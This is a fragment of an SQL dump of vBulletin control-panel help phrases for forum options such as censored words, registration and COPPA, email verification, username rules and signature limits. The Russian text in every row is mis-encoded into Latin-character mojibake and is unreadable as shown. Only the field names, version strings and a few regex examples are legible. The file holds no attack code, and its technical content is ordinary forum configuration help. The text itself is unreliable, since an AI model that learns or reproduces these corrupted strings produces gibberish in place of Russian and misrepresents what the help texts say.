(23170, -1, 'options_options_censorwords_text', 'cphelptext', 'Ââåäèòå çäåñü ñëîâà , êîòîðûå âû îïðåäåëÿåòå ÃåöåÃçóðÃûìè. Ãà çäåëÿéòå ñëîâà ïðîáåëà ìè. \r\nÂîò Ãåñêîëüêî ïðèìåðîâ, èëëþñòðèðóþùèõ ðà áîòó öåÃçîðà : \r\n\r\nÃðåäëîæåÃèå: \r\nÓêà æèòå ñâîé ïîë â à Ãêåòå ïðè çà ïîëÃÃ¥Ãèè. \r\nÑïèñîê öåÃçóðû: \r\n{ïîë} à Ãêåò \r\nÃåçóëüòà ò öåÃçóðû: \r\nÓêà æèòå ñâîé *** â *****Ã¥ ïðè çà ïîëÃÃ¥Ãèè. \r\nÑïèñîê öåÃçóðû: \r\nïîë {à Ãêåò} \r\nÃåçóëüòà ò öåÃçóðû: \r\nÓêà æèòå ñâîé *** â à Ãêåòå ïðè çà ***ÃÃ¥Ãèè. \r\n\r\nÃÃ¥ èñïîëüçóéòå êà âû÷êè, ò.ê. ýòî ìîæåò ïðèâåñòè ê îøèáêà ì. Óáåäèòåñü, ÷òî âû èñïîëüçóåòå ôèãóðÃûå ñêîáêè {} , à ÃÃ¥ îáû÷Ãûå () - ýòî ðà çÃûå âåùè. Òà êæå ïîìÃèòå, ÷òî âû ÃÃ¥ ìîæåòå çäåñü ïîäâåðãà òü ôðà çû öåÃçóðå, òà ê êà ê ïðîáåëû èñïîëüçóþòñÿ êà ê ðà çäåëèòåëè.', 'vbulletin', '', 0, ''),
(23171, -1, 'options_options_censorwords_title', 'cphelptext', 'Ñïèñîê ÃåöåÃçóðÃûõ ñëîâ', 'vbulletin', '', 0, ''),
(23172, -1, 'options_options_blankasciistrip_text', 'cphelptext', 'Âû ìîæåòå çà ïðåòèòü ïîëüçîâà òåëÿì èñïîëüçîâà òü Ãåêîòîðûå ñèìâîëû â èõ ñîîáùåÃèÿõ, èìåÃà õ è ò.ä.. Ãòè ñèìâîëû îáû÷Ãî äëÿ ïîëüçîâà òåëÿ âûãëÿäÿò îäèÃà êîâî, à äëÿ êîìïüþòåðà ïî-ðà çÃîìó. ×òîáû çà ïðåòèòü èñïîëüçîâà Ãèå òà êèõ ñèìâîëîâ, ââåäèòå èõ Ãîìåðà (â êîäèðîâêå), ðà çäåëÿÿ ïðîáåëà ìè. \r\n \r\nÂû ìîæåòå óêà çà òü Ãîìåðà ñèìâîëîâ äâóìÿ ñïîñîáà ìè:\r\n\r\nÃðîñòî Ãîìåð ñèìâîëà . Åñëè ÷èñëî Ãà õîäèòñÿ ìåæäó 0 è 255, òî îÃî áóäåò áðà òüñÿ èç òà áëèöû ASCII. Åñëè ÷èñëî áîëüøå 255, òî îÃî áóäåò îáðà áà òûâà òüñÿ êà ê âòîðîé ñïîñîá. \r\nÈñïîëüçîâà òü \"u\" ïåðåä ñèìâîëîì, êà ê Ãà ïðèìåð \"u8204\". Ãòî îçÃà ÷à åò, ÷òî áóäåò èñïîëüçîâà òüñÿ Unicode.  äà ÃÃîì ñëó÷à å èìååòñÿ â âèäó ñèìâîë ‌ èç êîäèðîâêè UTF-8. \r\n \r\nÃîæà ëóéñòà , ó÷òèòå, ÷òî çà ïðåùåÃèå ñèìâîëîâ â ýòîé îïöèè ìîæåò ïîâëèÿòü Ãà êîäèðîâêè. Óäà ëèòå ñîäåðæèìîå ýòîãî ïà ðà ìåòðà , åñëè çà ìåòèòå êà êèå-ëèáî ïðîáëåìû!', 'vbulletin', 'zCarot', 1205942089, '3.7.0 Release Candidate 1'),
(23173, -1, 'options_options_blankasciistrip_title', 'cphelptext', 'Èñêëþ÷à åìûå ñèìâîëû', 'vbulletin', '', 0, ''),
(23174, -1, 'options_options_allowregistration_text', 'cphelptext', 'Âû ìîæåòå âðåìåÃÃî èëè Ãà âñåãäà îòêëþ÷èòü âîçìîæÃîñòü ðåãèñòðà öèè Ãîâûõ ïîëüçîâà òåëåé, âûêëþ÷èâ ýòó îïöèþ.', 'vbulletin', '', 0, ''),
(23175, -1, 'options_options_allowregistration_title', 'cphelptext', 'Ãà çðåøèòü ðåãèñòðà öèþ Ãîâûõ ïîëüçîâà òåëåé', 'vbulletin', '', 0, ''),
(23176, -1, 'options_options_usecoppa_text', 'cphelptext', 'Âêëþ÷à åò ñèñòåìó ðåãèñòðà öèè COPPA. ÃŽÃà ñîîòâåòñòâóåò à ìåðèêà Ãñêèì çà êîÃà ì COPPA è òðåáóåò ïîëó÷åÃèÿ ðîäèòåëüñêîãî ðà çðåøåÃèÿ äåòÿì ìëà äøå 13, äî òîãî êà ê îÃè ñìîãóò îñòà âëÿòü ñîîáùåÃèÿ. Äëÿ ïîëó÷åÃèÿ áîëüøåé èÃôîðìà öèè îá ýòîì çà êîÃÃ¥ ïîñåòèòå ýòó ñòðà Ãèöó .', 'vbulletin', 'zCarot', 1231760784, '3.8.1'),
(23177, -1, 'options_options_usecoppa_title', 'cphelptext', 'Èñïîëüçîâà òü ñèñòåìó ðåãèñòðà öèè COPPA', 'vbulletin', '', 0, ''),
(23178, -1, 'options_options_moderatenewmembers_text', 'cphelptext', 'Ãðè âêëþ÷åÃèè ýòîé îïöèè âñå âÃîâü çà ðåãèñòðèðîâà ÃÃûå ïîëüçîâà òåëè ÃÃ¥ ïîëó÷à ò ïîëÃûõ ïðà â Ãà ôîðóìå äî ïîäòâåðæäåÃèÿ èõ ðåãèñòðà öèè à äìèÃèñòðà öèåé. Âû ìîæåòå óêà çà òü, êà êèå ïðà âà áóäóò èìåòü ïîëüçîâà òåëè, îæèäà þùèå ïîäòâåðæäåÃèÿ, ïóòåì èçìåÃÃ¥Ãèÿ ïðà â ãðóïïå \"(COPPA) Îæèäà þùèå ïðîâåðêè (Users Awaiting Moderation)\". Åñëè ó âà ñ òà êæå âêëþ÷åÃà îïöèÿ \"Ãðîâåðÿòü à äðåñ ýëåêòðîÃÃîé ïî÷òû ïðè ðåãèñòðà öèè\" (Ãèæå), ïîëüçîâà òåëü äîëæåà áóäåò ñÃà ÷à ëà ïîäòâåðäèòü ñâîé à äðåñ ýëåêòðîÃÃîé ïî÷òû, è òîëüêî ïîñëå ýòîãî îà áóäåò ïåðåìåùåà â ãðóïïó \"(COPPA) Îæèäà þùèå ïðîâåðêè (Users Awaiting Moderation)\".', 'vbulletin', '', 0, ''),
(23179, -1, 'options_options_moderatenewmembers_title', 'cphelptext', 'Ãðîâåðÿòü Ãîâûõ ïîëüçîâà òåëåé', 'vbulletin', '', 0, ''),
(23180, -1, 'options_options_regimagecheck_text', 'cphelptext', 'Åñëè ýòà ôóÃêöèÿ âêëþ÷åÃà , ïðè ðåãèñòðà öèè Ãîâîãî ïîëüçîâà òåëÿ áóäåò îòîáðà æåÃî èçîáðà æåÃèå ñî ñëó÷à éÃûì êîäîì. Ãîëüçîâà òåëü äîëæåà áóäåò ââåñòè ýòîò êîä â ïîëå ðåãèñòðà öèîÃÃîé ôîðìû. ÔóÃêöèÿ èñïîëüçóåòñÿ äëÿ ïðåäîòâðà ùåÃèÿ à âòîìà òè÷åñêèõ ðåãèñòðà öèé. PHP äîëæåà ïîääåðæèâà òü GD äëÿ ðà áîòû ýòîé îïöèè.', 'vbulletin', '', 0, ''),
(23181, -1, 'options_options_regimagecheck_title', 'cphelptext', 'Ãðîâåðêà èçîáðà æåÃèÿ', 'vbulletin', '', 0, ''),
(23182, -1, 'options_options_welcomemail_text', 'cphelptext', 'Åñëè âû âêëþ÷èòå ýòó îïöèþ, òî ïîëüçîâà òåëþ ïîñëå ðåãèñòðà öèè áóäåò îòïðà âëåÃî ïðèâåòñòâåÃÃîå ýëåêòðîÃÃîå ïèñüìî. ÃîìÃèòå, åñëè âû âêëþ÷èòå ïðîâåðêó à äðåñà ýëåêòðîÃÃîé ïî÷òû ïðè ðåãèñòðà öèè, òî ïðèâåòñòâåÃÃîå ýëåêòðîÃÃîå ïèñüìî áóäåò îòïðà âëåà òîëüêî ïîñëå ïðîõîæäåÃèÿ ïðîâåðêè. Åñëè âû âûáðà ëè ïðîâåðêó Ãîâûõ ïîëüçîâà òåëåé, òî ïèñüìî ÃÃ¥ ïðèä¸ò, ïîêà ïîëüçîâà òåëü ÃÃ¥ áóäåò îäîáðåà ìîäåðà òîðîì.', 'vbulletin', 'zCarot', 1145991013, '3.6.0 Beta 1'),
(23183, -1, 'options_options_welcomemail_title', 'cphelptext', 'Îòïðà âëÿòü ïðèâåòñòâåÃÃîå ýëåêòðîÃÃîå ïèñüìî', 'vbulletin', '', 0, ''),
(23184, -1, 'options_options_newuseremail_text', 'cphelptext', 'Åñëè âû æåëà åòå óâåäîìëÿòü îäÃîãî èëè Ãåñêîëüêèõ ëþäåé î ðåãèñòðà öèè Ãîâûõ ïîëüçîâà òåëåé, òî ââåäèòå èõ à äðåñà ýëåêòðîÃÃîé ïî÷òû â ýòî ïîëå, ðà çäåëÿÿ èõ ïðîáåëà ìè.', 'vbulletin', '', 0, ''),
(23185, -1, 'options_options_newuseremail_title', 'cphelptext', 'Àäðåñ ýëåêòðîÃÃîé ïî÷òû äëÿ óâåäîìëåÃèé î Ãîâûõ ïîëüçîâà òåëÿõ', 'vbulletin', '', 0, ''),
(23186, -1, 'options_options_allowmultiregs_text', 'cphelptext', 'Ôîðóì, ïî óìîë÷à Ãèþ, áóäåò ïðåñåêà òü ìÃîãîêðà òÃóþ ðåãèñòðà öèþ, ïðîâåðÿÿ cookies Ãà êîìïüþòåðå âÃîâü ðåãèñòðèðóåìîãî ïîëüçîâà òåëÿ. Åñëè âû æåëà åòå, ÷òîáû ïîëüçîâà òåëè ìîãëè ìÃîãîêðà òÃî ðåãèñòðèðîâà òüñÿ Ãà ôîðóìå, âûêëþ÷èòå ýòó îïöèþ. ÎäÃà êî ïîìÃèòå, ÷òî ïîëüçîâà òåëü ìîæåò âûéòè ñ ôîðóìà , óäà ëèòü âñå cookies âà øåãî ñà éòà è ñÃîâà çà ðåãèñòðèðîâà òüñÿ.', 'vbulletin', '', 0, ''),
(23187, -1, 'options_options_allowmultiregs_title', 'cphelptext', 'Çà ïðåòèòü ìÃîãîêðà òÃóþ ðåãèñòðà öèþ (ìóëüòèèìåÃà )', 'vbulletin', '', 0, ''),
(23188, -1, 'options_options_verifyemail_text', 'cphelptext', 'Åñëè âû âêëþ÷èòå ýòó îïöèþ, òî à äðåñ ýëåêòðîÃÃîé ïî÷òû ïîëüçîâà òåëÿ áóäåò ïðîâåðÿòüñÿ ïðè ðåãèñòðà öèè ñ ïîìîùüþ îòïðà âëåÃèÿ Ãà Ãåãî ýëåêòðîÃÃîãî ïèñüìà ; ïîëüçîâà òåëü äîëæåà áóäåò Ãà æà òü Ãà ïîäòâåðæäà þùóþ ññûëêó â ïèñüìå, ÷òîáû ñèñòåìà óáåäèëà ñü, ÷òî à äðåñ ýëåêòðîÃÃîé ïî÷òû ïðèÃà äëåæèò åìó. Åñëè ññûëêà ÃÃ¥ áóäåò ïîñåùåÃà , òî ïîëüçîâà òåëü áóäåò Ãà õîäèòüñÿ â ãðóïïå ïîëüçîâà òåëåé \"Îæèäà þùèå ïîäòâåðæäåÃèÿ\" äî òåõ ïîð, ïîêà îà ÃÃ¥ ïîñåòèò ññûëêó, ëèáî äî òåõ ïîð, ïîêà âû ÃÃ¥ óäà ëèòå åãî. Åñëè âû ê òîìó æå âêëþ÷èëè îïöèþ ïðîâåðêè Ãîâûõ ó÷à ñòÃèêîâ, òî ïîëüçîâà òåëè, ïðîøåäøèå ïðîâåðêó ïî ýëåêòðîÃÃîé ïî÷òå, áóäóò ïåðåìåùåÃû â ãðóïïó \"(COPPA) Îæèäà þùèå ïðîâåðêè\" è áóäóò Ãà õîäèòüñÿ â Ãåé äî òåõ ïîð, ïîêà âû ÃÃ¥ à âòîðèçóåòå èõ.', 'vbulletin', '', 0, ''),
(23189, -1, 'options_options_verifyemail_title', 'cphelptext', 'Ãðîâåðÿòü à äðåñ ýëåêòðîÃÃîé ïî÷òû ïðè ðåãèñòðà öèè', 'vbulletin', '', 0, ''),
(23190, -1, 'options_options_requireuniqueemail_text', 'cphelptext', 'Ãî óìîë÷à Ãèþ ôîðóì òðåáóåò óÃèêà ëüÃûå à äðåñà ýëåêòðîÃÃîé ïî÷òû äëÿ êà æäîãî ïîëüçîâà òåëÿ. Åñëè âû âûêëþ÷èòå ýòîò ïà ðà ìåòð, òî ìÃîæåñòâó ïîëüçîâà òåëåé ðà çðåøåÃî áóäåò èñïîëüçîâà òü îäèà è òîò æå à äðåñ ýëåêòðîÃÃîé ïî÷òû.', 'vbulletin', '', 0, ''),
(23191, -1, 'options_options_requireuniqueemail_title', 'cphelptext', 'Òðåáîâà òü óÃèêà ëüÃûå à äðåñà ýëåêòðîÃÃîé ïî÷òû', 'vbulletin', '', 0, ''),
(23192, -1, 'options_options_minuserlength_text', 'cphelptext', 'Óñòà Ãîâêà ìèÃèìà ëüÃîãî ÷èñëà ñèìâîëîâ, äîïóñòèìîãî â èìåÃè ïîëüçîâà òåëÿ.', 'vbulletin', '', 0, ''),
(23193, -1, 'options_options_minuserlength_title', 'cphelptext', 'ÌèÃèìà ëüÃà ÿ äëèÃà èìåÃè ïîëüçîâà òåëÿ', 'vbulletin', '', 0, ''),
(23194, -1, 'options_options_maxuserlength_text', 'cphelptext', 'Óñòà Ãîâêà ìà êñèìà ëüÃîãî ÷èñëà ñèìâîëîâ, äîïóñòèìîãî â èìåÃè ïîëüçîâà òåëÿ.', 'vbulletin', '', 0, ''),
(23195, -1, 'options_options_maxuserlength_title', 'cphelptext', 'Ìà êñèìà ëüÃà ÿ äëèÃà èìåÃè ïîëüçîâà òåëÿ', 'vbulletin', '', 0, ''),
(23196, -1, 'options_options_illegalusernames_text', 'cphelptext', 'Âûáåðèòå èìåÃà èëè ÷à ñòè èì¸à ïîëüçîâà òåëåé (ðà çäåëÿéòå ïðîáåëà ìè), ïðè èñïîëüçîâà Ãèè êîòîðûõ ïîëüçîâà òåëè ÃÃ¥ ñìîãóò ïðîéòè ðåãèñòðà öèþ. Ãà ïðèìåð, åñëè âû ââåäåòå \"CâèÃ\", òî Ãèêòî ÃÃ¥ ñìîæåò çà ðåãèñòðèðîâà òüñÿ Ãè êà ê \"ÑâèÃüÿ\", Ãè êà ê \"ÑâèÃÿòà \".', 'vbulletin', '', 0, ''),
(23197, -1, 'options_options_illegalusernames_title', 'cphelptext', 'Ãåäîïóñòèìûå èìåÃà ïîëüçîâà òåëåé', 'vbulletin', '', 0, ''),
(23198, -1, 'options_options_usernameregex_text', 'cphelptext', 'Âû ìîæåò òðåáîâà òü ñîîòâåòñòâèå èìåÃè Ãîâîãî ïîëüçîâà òåëÿ Ãåêîìó ðåãóëÿðÃîìó âûðà æåÃèþ (PCRE).\r\n \r\n(ÃÃ¥ Ãà ÷èÃà éòå è ÃÃ¥ çà êà Ã÷èâà éòå âûðà æåÃèå ýêðà Ãèðóþùèì ñèìâîëîì) \r\n \r\nÃðèìåðû: \r\n^[A-Z]+$ - òîëüêî ëà òèÃñêèå áóêâû A-Z \r\n^[A-Z ]+$ - òîëüêî ëà òèÃñêèå áóêâû A-Z è ïðîáåëû \r\n^[A-Z0-9 ]+$ - ëà òèÃñêèå áóêâû A-Z, öèôðû è ïðîáåëû \r\n^((?!&#\\d+;)[\\x20-\\x7E])+$ - ASCII ñèìâîëû îò 32 äî 127 \r\n \r\nÑì. PHP.net äëÿ ïîèñêà áîëåå ïîäðîáÃîé èÃôîðìà öèè î ðåãóëÿðÃûõ âûðà æåÃèÿõ.', 'vbulletin', 'zCarot', 1207215367, '3.7.0 Release Candidate 3'),
(23199, -1, 'options_options_usernameregex_title', 'cphelptext', 'ÃåãóëÿðÃîå âûðà æåÃèå äëÿ èìåÃè ïîëüçîâà òåëÿ', 'vbulletin', 'zCarot', 1142612083, '3.6.0 Beta 1'),
(23200, -1, 'options_options_usereferrer_text', 'cphelptext', 'Ñ âêëþ÷åÃèåì ýòîé îïöèè áóäåò çà ïóùåÃà ñèñòåìà ïðèãëà øåÃèÿ ïîëüçîâà òåëåé, â êîòîðîé êà æäûé ïîëüçîâà òåëü ñìîæåò ïðèãëà ñèòü äðóãèõ ëþäåé â ñèñòåìó, äà â èì ññûëêó, ñîäåðæà ùóþ â êîÃöå \r\nreferrerid=XXX \r\n, ãäå XXX - id ïîëüçîâà òåëÿ, ïðèãëà øà þùåãî äðóãèõ. Åñëè ðåãèñòðèðóþùèéñÿ ÷åëîâåê ïðîø¸ë èçÃà ÷à ëüÃî ïî ýòîé ññûëêå, òî îà ñòà Ãåò ðåôåððà ëîì ïîëüçîâà òåëÿ.', 'vbulletin', 'zCarot', 1226335442, '3.8.0 Beta 3'),
(23201, -1, 'options_options_usereferrer_title', 'cphelptext', 'Ãðèãëà øåÃèå ïîëüçîâà òåëåé', 'vbulletin', '', 0, ''),
(23202, -1, 'options_options_defaultregoptions_text', 'cphelptext', 'Âûáåðèòå îïöèè, êîòîðûå áóäóò âûñòà âëåÃû ïî óìîë÷à Ãèþ â ôîðìå ðåãèñòðà öèè.', 'vbulletin', '', 0, ''),
(23203, -1, 'options_options_defaultregoptions_title', 'cphelptext', 'Îïöèè ïî óìîë÷à Ãèþ ïðè ðåãèñòðà öèè', 'vbulletin', '', 0, ''),
(23204, -1, 'options_options_usernamereusedelay_text', 'cphelptext', 'Ãòîò ïà ðà ìåòð ïîçâîëÿåò âà ì ïðåäîòâðà òèòü ïîâòîðÃîå èñïîëüçîâà Ãèå èìåÃè ïîëüçîâà òåëÿ Ãà îïðåäåë¸ÃÃûé ñðîê (â äÃÿõ) ïîñëå òîãî, êà ê êà êîé-òî ïîëüçîâà òåëü áûë ïåðåèìåÃîâà Ã. \r\n \r\nÃà ïðèìåð, åñëè âû èçìåÃèëè èìÿ ïîëüçîâà òåëÿ ñ \"zCà rît\" Ãà \"zÃŒaðêoâü\", òî Ãèêòî ÃÃ¥ ñìîæåò çà ðåãèñòðèðîâà òü ñ èìåÃåì ïîëüçîâà òåëÿ \"zCà rît\" â òå÷åÃèå 365 äÃåé (ïî óìîë÷à Ãèþ).', 'vbulletin', 'zCarot', 1199131083, '3.7.0 Beta 4'),
(23205, -1, 'options_options_usernamereusedelay_title', 'cphelptext', 'Çà äåðæêà ìåæäó ïîâòîðÃûì èñïîëüçîâà Ãèåì èìåÃè', 'vbulletin', 'zCarot', 1191253683, '3.7.0 Beta 1'),
(23206, -1, 'options_options_social_moderation_text', 'cphelptext', 'Åñëè \"Äà \", òî âñå ñîîáùåÃèÿ â ñîöèà ëüÃûõ ãðóïïà õ áóäóò à âòîìà òè÷åñêè îòïðà âëÿòüñÿ Ãà ïðîâåðêó.', 'vbulletin', 'zCarot', 1195730414, '3.7.0 Beta 1'),
(23207, -1, 'options_options_social_moderation_title', 'cphelptext', 'Ãðîâåðêà ñîîáùåÃèé â ñîöèà ëüÃûõ ãðóïïà õ', 'vbulletin', 'zCarot', 1195730414, '3.7.0 Beta 1'),
(23208, -1, 'options_options_reqbirthday_text', 'cphelptext', 'Åñëè ýòà îïöèÿ âêëþ÷åÃà , ïîëüçîâà òåëÿì ïðèä¸òñÿ ââåñòè êîððåêòÃóþ äà òó ðîæäåÃèÿ ïðè ðåãèñòðà öèè. Ñóùåñòâóþùèå ïîëüçîâà òåëè äîëæÃû áóäóò ââåñòè äà òó ïðè ïåðâîì æå èçìåÃÃ¥Ãèè ñâîåãî ïðîôèëÿ. Äîïóñòèìûì ãîäîì ÿâëÿåòñÿ ÷èñëî îò 1902 äî òåêóùåãî ãîäà . ÎäÃà æäû ââåä¸ÃÃóþ äà òó óæå Ãåëüçÿ áóäåò èçìåÃèòü.', 'vbulletin', 'zCarot', 1195217209, '3.7.0 Beta 1'),
(23209, -1, 'options_options_reqbirthday_title', 'cphelptext', 'Òðåáîâà òü äà òó ðîæäåÃèÿ', 'vbulletin', '', 0, ''),
(23210, -1, 'options_options_ctMaxChars_text', 'cphelptext', 'Ãòà óñòà Ãîâêà îïðåäåëÿåò ìà êñèìà ëüÃîå êîëè÷åñòâî ñèìâîëîâ, èñïîëüçóåìûõ ïîëüçîâà òåëåì â ñîáñòâåÃÃîì ñòà òóñå.', 'vbulletin', '', 0, ''),
(23211, -1, 'options_options_ctMaxChars_title', 'cphelptext', 'Ìà êñèìà ëüÃà ÿ äëèÃà ñòà òóñà ïîëüçîâà òåëÿ', 'vbulletin', '', 0, ''),
(23212, -1, 'options_options_ctCensorWords_text', 'cphelptext', 'Ââåäèòå çäåñü ñëîâà , êîòîðûå âû îïðåäåëÿåòå ÃåöåÃçóðÃûìè. Ãà çäåëÿéòå ñëîâà ïðîáåëà ìè. \r\nÀâòî-öåÃçîð îáðà áîòà åò ñëîâà , ÿâëÿþùèåñÿ ÷à ñòÿìè äðóãîãî ñëîâà , Ãà ïðèìåð \"õðåÃ\" - ÷à ñòü ñëîâà \"õðåÃîâèÃà \". Åñëè òðåáóåòñÿ îáðà áîòêà òîëüêî êîÃêðåòÃîãî ñëîâà (ò.Ã¥. ÃÃ¥ îáðà áà òûâà òü, Ãà ïðèìåð, îäÃîêîðåÃÃûå ñëîâà ), âîçüìèòå òà êîå ñëîâî â ôèãóðÃûå ñêîáêè, Ãà ïðèìåð: \r\n{ïîë} \r\nÃðèìåðû: \r\nÃðåäëîæåÃèå: Óêà æèòå ñâîé ïîë â à Ãêåòå ïðè çà ïîëÃÃ¥Ãèè. \r\nÑïèñîê öåÃçóðû: {ïîë} à Ãêåò \r\nÃåçóëüòà ò öåÃçóðû: Óêà æèòå ñâîé *** â *****Ã¥ ïðè çà ïîëÃÃ¥Ãèè. \r\nÑïèñîê öåÃçóðû: ïîë {à Ãêåò} \r\nÃåçóëüòà ò öåÃçóðû: Óêà æèòå ñâîé *** â à Ãêåòå ïðè çà ***ÃÃ¥Ãèè. \r\nÃÃ¥ èñïîëüçóéòå êà âû÷êè, ò.ê. ýòî ìîæåò ïðèâåñòè ê îøèáêà ì. Òà êæå áóäüòå âÃèìà òåëüÃû, ò.ê. èñïîëüçîâà Ãèå ôèãóðÃûõ ñêîáîê {} è îáû÷Ãûõ ñêîáîê () - ðà çÃûå âåùè.', 'vbulletin', '', 0, ''),
(23213, -1, 'options_options_ctCensorWords_title', 'cphelptext', 'Ñïèñîê ÃåöåÃçóðÃûõ ñëîâ', 'vbulletin', '', 0, ''),
(23214, -1, 'options_options_minifriends_amount_text', 'cphelptext', 'Ìà êñèìà ëüÃîå êîëè÷åñòâî äðóçåé, îòîáðà æà åìûõ â ìà ëîì áëîêå äðóçåé â ïðîôèëå ïîëüçîâà òåëÿ', 'vbulletin', 'zCarot', 1195731759, '3.7.0 Beta 1'),
(23215, -1, 'options_options_minifriends_amount_title', 'cphelptext', 'Êîëè÷åñòâî äðóçåé â ìà ëîì áëîêå äðóçåé', 'vbulletin', 'zCarot', 1195731759, '3.7.0 Beta 1'),
(23216, -1, 'options_options_ctCensorMod_text', 'cphelptext', 'Ãðè âêëþ÷åÃèè ýòîé îïöèè ìîäåðà òîðû ÃÃ¥ áóäóò ïîäâåðãà òüñÿ öåÃçóðå. Ãà ïðèìåð, åñëè âû ïîäâåðãëè öåÃçóðå ñëîâî \"ìîäåðà òîð\" â ñòà òóñå ïîëüçîâà òåëÿ, Ãî æåëà åòå, ÷òîáû âà øè ìîäåðà òîðû ìîãëè èñïîëüçîâà òü ýòî ñëîâî â ñâîåì ñòà òóñå, âû äîëæÃû âêëþ÷èòü ýòó îïöèþ.', 'vbulletin', '', 0, ''),
(23217, -1, 'options_options_ctCensorMod_title', 'cphelptext', 'Èñêëþ÷èòü ìîäåðà òîðîâ èç çîÃû äåéñòâèÿ à âòî-öåÃçîðà ', 'vbulletin', '', 0, ''),
(23218, -1, 'options_options_friends_per_page_text', 'cphelptext', 'Êîëè÷åñòâî äðóçåé, îòîáðà æà åìûõ Ãà îäÃîé ñòðà Ãèöå ïîëÃîãî ñïèñêà äðóçåé â ïðîôèëå ïîëüçîâà òåëÿ \r\n \r\nÃîìÃèòå: Ãòî ÷èñëî äîëæÃî áûòü áîëüøå Ãóëÿ.', 'vbulletin', 'zCarot', 1208955613, '3.7.0 Release Candidate 4'),
(23219, -1, 'options_options_friends_per_page_title', 'cphelptext', 'Äðóçåé Ãà îäÃó ñòðà Ãèöó ïîëÃîãî ñïèñêà äðóçåé', 'vbulletin', 'zCarot', 1195732107, '3.7.0 Beta 1'),
(23220, -1, 'options_options_profilemaxvisitors_text', 'cphelptext', 'Ìà êñèìà ëüÃîå êîëè÷åñòâî îòîáðà æà åìûõ ïîñåòèòåëåé ïðîôèëÿ. Ñïèñîê ïîñëåäÃèõ ïîñåòèòåëåé î÷èùà åòñÿ ïåðèîäè÷åñêè, ïîýòîìó åñòü ïðè÷èÃû óêà çà òü çäåñü ÃÃ¥ î÷åÃü áîëüøîå ÷èñëî.  áîëüøèÃñòâå ñëó÷à åâ ñëåäóåò óêà çà òü ÷èñëî îò 5 äî 30.', 'vbulletin', 'zCarot', 1198246099, '3.7.0 Beta 4'),
(23221, -1, 'options_options_profilemaxvisitors_title', 'cphelptext', 'Ìà êñèìà ëüÃîå êîëè÷åñòâî îòîáðà æà åìûõ ïîñåòèòåëåé ïðîôèëÿ', 'vbulletin', 'zCarot', 1198246099, '3.7.0 Beta 4'),
(23222, -1, 'options_options_softlinebreakchars_text', 'cphelptext', 'Ãòîò ïà ðà ìåòð ñâÿçà à ñ ïðà âà ìè, îïðåäåëÿþùèìè êîëè÷åñòâî ñòðîê, êîòîðîå ìîæåò èìåòü ïîëüçîâà òåëü â ïîäïèñè. \r\n \r\nÅñëè òåêñò Ãà áðà à áåç ïåðåÃîñîâ ñòðîêè, Ãî ïðè ýòîì ñ áîëüøèì êîëè÷åñòâîì ñèìâîëîâ â Ãåé, òî îáîçðåâà òåëü â êà êîé-òî ìîìåÃò ñà ìîñòîÿòåëüÃî ïåðåâåä¸ò ñòðîêó, ÷òîáû ÃÃ¥ ðà ñòÿãèâà òü îòîáðà æåÃèå ôîðóìà â øèðèÃó. Ãòîò ïà ðà ìåòð îïðåäåëÿåò, ñêîëüêî ñèìâîëîâ ìåæäó äâóìÿ ïåðåâîäà ìè ñòðîêè ñ÷èòà òü çà îäÃó ñòðîêó. ÑîîòâåòñòâåÃÃî, åñëè âû óñòà Ãîâèòå çäåñü 100, òî ñòðîêà äëèÃÃîé â 236 ñèìâîëîâ áóäåò ñ÷èòà òüñÿ ôîðóìîì çà òðè ñòðîêè (100+100+36).', 'vbulletin', 'zCarot', 1155818656, '3.6.1'),
(23223, -1, 'options_options_softlinebreakchars_title', 'cphelptext', 'Ìà êñèìà ëüÃîå êîëè÷åñòâî ñèìâîëîâ â ñòðîêå ïîäïèñè', 'vbulletin', 'zCarot', 1155818656, '3.6.1'),
(23224, -1, 'options_options_sigmax_text', 'cphelptext', 'Ãòîò ïà ðà ìåòð îïðåäåëÿåò ìà êñèìà ëüÃîå êîëè÷åñòâî ñèìâîëîâ, êîòîðûå ìîæåò ââåñòè ïîëüçîâà òåëü â ñâîþ ïîäïèñü.', 'vbulletin', '', 0, ''),
(23225, -1, 'options_options_sigmax_title', 'cphelptext', 'Ìà êñèìà ëüÃà ÿ äëèÃà ïîäïèñè', 'vbulletin', '', 0, ''),
(23226, -1, 'options_options_allowbbcode_text', 'cphelptext', 'Ãðè âêëþ÷åÃèè ýòîé îïöèè, ïîëüçîâà òåëè ñìîãóò èñïîëüçîâà òü BB êîäû (òà êèå êà ê [b], [i] è ò.ä.) â ìåñòà õ âÃÃ¥ ðà çäåëîâ. Ãòîò ïà ðà ìåòð ÃÃ¥ èñïîëüçóåòñÿ îñÃîâÃîé ÷à ñòüþ ôîðóìà , Ãî ìîæåò èñïîëüçîâà òüñÿ â ðà çëè÷Ãûõ äîïîëÃÃ¥Ãèÿõ/ìîäóëÿõ ê ôîðóìó.', 'vbulletin', 'zCarot', 1206964476, '3.7.0 Release Candidate 2'),
(23227, -1, 'options_options_allowbbcode_title', 'cphelptext', 'Ãà çðåøèòü BB êîäû â ìåñòà õ âÃÃ¥ ðà çäåëîâ', 'vbulletin', 'zCarot', 1206964493, '3.7.0 Release Candidate 2'),
(23228, -1, 'options_options_allowsmilies_text', 'cphelptext', 'Ãðè âêëþ÷åÃèè ýòîé îïöèè, ïîëüçîâà òåëè ñìîãóò èñïîëüçîâà òü â ìåñòà õ âÃÃ¥ ðà çäåëîâ ñìà éëû, Ãà ïðèìåð :) è :( , êîòîðûå áóäóò îòîáðà æåÃû êà ê èçîáðà æåÃèÿ - ñìà éëû.\r\nÃòîò ïà ðà ìåòð ÃÃ¥ èñïîëüçóåòñÿ îñÃîâÃîé ÷à ñòüþ ôîðóìà , Ãî ìîæåò èñïîëüçîâà òüñÿ â ðà çëè÷Ãûõ äîïîëÃÃ¥Ãèÿõ/ìîäóëÿõ ê ôîðóìó.', 'vbulletin', 'zCarot', 1172666320, '3.6.5'),
(23229, -1, 'options_options_allowsmilies_title', 'cphelptext', 'Ãà çðåøèòü ñìà éëû â ìåñòà õ âÃÃ¥ ðà çäåëîâ', 'vbulletin', 'zCarot', 1172666334, '3.6.5'),
